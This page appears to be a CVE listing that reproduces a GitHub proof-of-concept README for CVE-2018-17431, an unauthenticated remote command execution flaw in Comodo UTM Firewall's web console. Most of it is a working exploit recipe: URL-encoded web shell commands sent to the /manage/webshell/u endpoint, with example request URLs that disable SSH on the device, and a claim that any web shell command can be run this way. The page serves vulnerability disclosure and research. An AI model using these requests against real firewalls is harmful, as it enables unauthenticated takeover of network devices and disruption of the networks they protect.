Headline

CVE-2018-17431: GitHub - Fadavvi/CVE-2018-17431-PoC: Proof of consept for CVE-2018-17431

Web Console in Comodo UTM Firewall before 2.7.0 allows remote attackers to execute arbitrary code without authentication via a crafted URL.

5 years ago

CVE

Open in Source

#web #windows #git #php #auth #ssh #chrome #firefox

CVE-2018-17431-PoC

Proof of consept for CVE-2018-17431

Exploit Title: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Command Execution (Web Shell based)****Exploit Author: Milad Fadavvi****Vendor Homepage: https://www.comodo.com/****Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276****Version: before 2.7.0 & 1.5.0****Tested on: Windows:firefox/chrome - Kali:firefox****Discovery Date: 2018-08-15 (reported in sameday)****Confirmation than bug exist: 2018-09-22 (Ticket ID: XWR-503-79437)****Patch released: 2018-11-23 Release Notes from Comodo

Exploit:

WebShell simulation:

 For example disable SSH in web shell is like this:
     - service [hit enter]
     - ssh [hit enter]
     - disable [hit enter]

Encode

 make above sequense encode with URL ECODING
 (I used burp encoder plugin)

 %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a

Run

 Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
 
 
           https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
           

 Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
 
       https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152

A page with “Configuration has been altered” message will show up and configuration changed!

With this technic, we can simulate all WebShell Commands.